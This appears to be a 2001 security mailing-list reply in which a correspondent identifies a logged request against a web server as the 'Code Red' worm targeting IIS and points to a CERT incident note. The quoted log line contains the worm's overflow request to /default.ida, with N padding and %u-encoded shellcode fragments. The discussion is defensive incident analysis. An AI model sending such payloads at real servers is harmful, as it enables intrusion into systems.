>>>>> "Brian" == Brian Rectanus <brectanu@vt.edu> writes:
Brian> Anyone seen this before? I have looked around for similar
Brian> attacks, but cannot find any info. I assume that is a
Brian> unicode string padded out with Ns. How would I go about
Brian> finding out what is in the string?
Brian> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
Brian> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Brian> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Brian> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
Brian> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
Brian> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
Brian> 078%u0000%u00=a HTTP/1.0" 400 328
"Code Red" --> IIS
http://www.cert.org/incident_notes/IN-2001-08.html
Seems to be quiet efficient, seven attempts so far ...
--
(Dr.) Michael Hummel
mailto: mh@seitung.net || molino@gmx.net
--
fprint = F24D EAC6 E3D7 372C 9122 D510 EB24 01CA 0B56 B518
id: 1024D/0B56B518 key: http://www.seitung.net/keyAttachment:
pgpu_MkmyCauk.pgp
Description: PGP signature